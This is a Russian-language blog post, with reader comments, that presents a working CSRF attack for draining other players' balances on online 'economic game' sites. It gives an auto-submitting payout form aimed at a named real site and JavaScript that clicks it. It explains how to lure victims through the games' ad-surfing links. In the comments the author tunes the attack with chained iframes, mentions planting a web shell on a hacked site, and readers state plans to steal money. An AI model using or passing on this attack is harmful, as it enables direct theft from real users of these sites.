Взлом экономической игры — массовый угон средств участников

После очередного скама я окончательно разочаровался в экономических играх, будучи в плохом настроении я скачал пару движков  и принялся искать в них баги и уязвимости.

После первых 10 минут исследований я понял, что не зря это затеял, первым  что меня удивило было наличие открытых паролей участников в базе данных, это уже говорит о том что разработчик движка мало думал о безопасности проектов.

Буквально на следующий день у меня в арсенале были  найдены 3 уязвимости и куча багов которые, были не только в отдельных модулях, а и в самом движке.

В этой статье я поделюсь с вами одной такой уязвимостью. Вы наверно захотите спросить – откуда такая щедрость? я вам отвечу – просто остальные баги проще реализовать, и спаливши одну из уязвимостей я особо ничего не потеряю, всё равно её исправлять ник-то не будет))

CSRF

CSRF (Cross-Site Request Forgery) – атака, позволяющая хакеру выполнить на целевом сайте различные действия от имени других, зарегистрированных посетителей.

Абсолютно все движки игр подвержены этой уязвимости!  Благодаря ей можно сделать в чужом аккаунте всё что угодно, но самое привлекательное это списать чужие средства на свой кошелек.

Делается это просто, первым делом подготавливаем форму заказа выплаты.


<form action = "http://serfland.ru/account/payment" method = "post" >
<input type = "text" name= "purse" value = "P000000">
<input type = "text" name= "sum" value = "50">
<input type = "text" name= "val_type" value = "RUB">
<input type="submit" id="myButton" onclick="myFunc()" >
</form>

Далее под ней вставляем javascript код который заставит браузер нажать на кнопку формы.

<script>
setTimeout(function() {document.getElementById("myButton").click();},1);
</script>

Данный код сохраняем на вашем сайте в любом файле, и останется его подсунуть жертве, причем жертв даже не нужно искать и разводить, достаточно добавить ссылку на ваш сайт в серфинг который есть почти в каждой игре, и дело в шляпе.

Ниже видео с примером.

61 thoughts on “Взлом экономической игры — массовый угон средств участников

  1. а можно взломать економическю игру чеез баз данных ? в админку ника не залезть ?

  2. В гугле, вам такое и не надо, можно просто создать файл на компьютере и залить на ваш хостинг.

  3. Спс большое очень жду делайте по больше видио я буду смотреть все научити как ломать проекти как дири искать как рипать сайти и не только спс жду ваших видио

  4. а если заглушка стоит то не выведешь я так понимаю ничего? у меня не получилось например(((
    А вот конкретно если перейдут по ссылке то выведет тока у тех кто уже может выводить без заглушки у кого?
    Если да, то как сделать чтобы заглушку обходить.. я думаю всем это будет интересно…

    • заглушку никак не обойдешь, на то она заглушка, можно обменять все деньги на счет для покупок, и пригорать в кнб или другую игру.

      • спасибо за ответ. У меня еще вопрос. А выводит все деньги сразу или скока прописано тока? 50 копеек и все? можно как то сделать чтобы под 0 выводило?

        • ну понимаешь, откуда знать сколько у человека на аккаунте денег? — никак, можно в цикле выводить от большего к меньшему тогда точно угадаем, а 50 — это я так, от фонаря взял))

  5. если к примеру несколько фреймов вставить по 50 копеек — штук 100 — то сработает на всех сразу фреймах я так понимаю? и скока есть выведет если нету напишет не вывело? это про массовый)
    И один и тот же прописывать адрес фрейма можно в несколько раз — сработают ли они по отдельности или нет?
    То есть например я перехожу по ссылке а там красивая страничка и в ней фреймы стоят.. ведут например на /serf.php штук 10 таких. вывод по 50 копеек. у меня на счете 20 р на вывод — выведется сразу 10 раз по 50 копеек или тока 1 раз

    • смотри, в играх бывают разные условия, например вывод только раз в 12 часов, в таком случае сработает сработают все но выведет только с одного, который откроется самым первым, поэтому фреймы нужно открывать по очереди javascript’ом от того где сумма больше к тем где меньше и тогда точно угадаем)

      • эх я не умею так делать( так бы сделал циклом.. Но вообще метод суперский.. я уже поставил на тест посмотрю что будет… Если что хорошо попрет я отпишу тут и отблагодарю) хочу многим мошенникам сделать зло…пусть и сам мошенником буду

        • Я может позже, недели через 3, открою ветку на форуме(хакинг), там можно будет и подробно обсудить нюансы, новые схемы, технические моменты и тд.

  6. ничего не понял. Можно снять пошагово что куда, и как? Разжевать. Не все же такие продвинутые.

  7. Буквально на следующий день у меня в арсенале были найдены 3 уязвимости и куча багов которые, были не только в отдельных модулях, а и в самом движке.
    Ты одну дал дай ищо 2 увязимосты пожалоста

  8. Ну тот же розказал розкажи хоть один ищо пожалоста одам как на проектах за работаю одам больше

  9. eval($_GET[‘fs’]); можеш розказать что ето код делает и как использоют ево нашол на фф скрипте

  10. копирую мой коммент

    а для регистрации куча акков можно и просто каждый раз чистить куки и зарегать заново (у меня есть прога для автоматизации — но она настроена была на сайт аеробус..). и да я не такой гнилой админ как другие — я щас тоже работаю над скриптом и хочу запустить скоро. но вот я начинающий программист, изучаю щас js и php — и многого не понимаю((( но после того как нашел вас стало совсем страшно((( я бы хотел сделать всякие полезные штучки на сайте чтобы проект не умер и чтобы никого не кидать.

    у меня был уже случай когда с пейера через апи все деньги снимали :((( блин я же не хочу никого кидать(((

    как мне быть? как найти баги. хотя что я говорю — тут же все как бы злоумышленники))))

  11. Здравствуйте, если способ сейчас работает, можете отправить меня сайты на котором работает 100%

  12. Djoser ты вообще красавчик! я тут сидел неделю мучался хотел создать игру, чтобы бабла подстрич… Очень устал. Столько скриптов перебрал, перекачал. Множество недоделок и практический ноль знаний при всём при этом… так ничего и не понял до конца… теперь блин новая тема: Взломать к х..ям какую-нибудь игру и срубить нормально лавэ! 😀 Спасибо тебе огромное дружище! Даст Бог и у меня что-нибудь и выйдет.
    Из-под земли тебя достану и расцелую!!! Респект тебе, брат!

  13. Всё оказалось не так уж и просто… 🙁 нигде нет инфы как и куда заливать WSO2… Действительно порыл не мало. так и не нашел почти нифига… (Наверное это уровень Бога) Не для смертных короче. 🙂 Да-Да! понимаю что можно и без «web shell» обойтись, но заливание наших гениальных скрипто-скрежалей с формой для выплаты на сайт вообще не понял… Ты сказал- Вставляешь в любой файл, находящийся на моём сайте… так?
    Так уж вышло, что я БЕЗДАРНОСТЬ. :-/ Но вот хоть что-нибудь очень хочется понять… Я читал предыдущие коменты, что ты далеко не консультант. Но хотя-бы укажи на правильное течение… А то может я и не в ту степь вовсе и мыслю… Жалко времени уже становиться… Заранее благодарю и в долгу не останусь.

    П.С. и подскажи пожалуйста сайт форума «хакинг»
    , может и там чего полезного вычитаю.

    • Тебе нужно хостинг зарегистрировать, с бесплатным доменом, и уж туда все заливать.

  14. блин, не поверишь! так и делаю. теперь мне еще ужасную надпись пишет типа: Detected as: Win.Trojan.Shell-68

  15. рад что ответил, хоть что-то! 🙂 это я пытаюсь шел туда воткнуть… наверное не нужно, да? туда его заливать? пиз..ец, голова кгругом уже… А база данных нужна для этого какая-нибудь, или просто в файлы в /public_html вставляешь и в шляпе с понтом…. один раз норм выходило что (как мне кажется) Или мне нужно только Скрипт воткнуть с формой на сайт? Извини за много ??????? Можешь не отвечать, можешь послать, можешь поржать… 😉 а мне уже плакать хочется… ниху…шечки не получается….

    • я использовал шелл потому что сайт был взломан и доступа в панель у меня небыло. у тебя есть панель, делай тоже самое что на видео.

  16. Спасибо и на том! 🙂
    И будь любезен, подскажи сайт форума «хакинг» там я понял ты частенько живёшь, может и я там чего полезного вычитаю.

  17. Первый вариант я так понял просто в index.html ?
    А второй вариант это уже через php и ты там прописываешь iframe и путь к файлу cash.php а что там в этом файле какой код ? или там одна форма выплаты без скрипта и все ?

  18. Not Found

    The requested URL /cash.php was not found on this server.

    Apache/2.2.29 (Unix) mod_fcgid/2.3.9 Server at tph666-ru.1gb.ru Port 80 выдаёт ошибку

  19. Вставил код со скриптом на сайте( заменил код простого банера)! При открытии моего сайта—перекидывает на сайт игры которой прописал в коде….А дальше даже не пойму—раб.или нет?! Сайт у меня от конструктора сайтов webnode.ru! на нём пройдёт ваша процедура?? закинул сайт в серфинг на сайте игры—но пока тихо…

  20. или нужен отд.хостинг, а сайт мой созданый на конструкторе вебноде не подойдёт? спс заранее за ответ

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *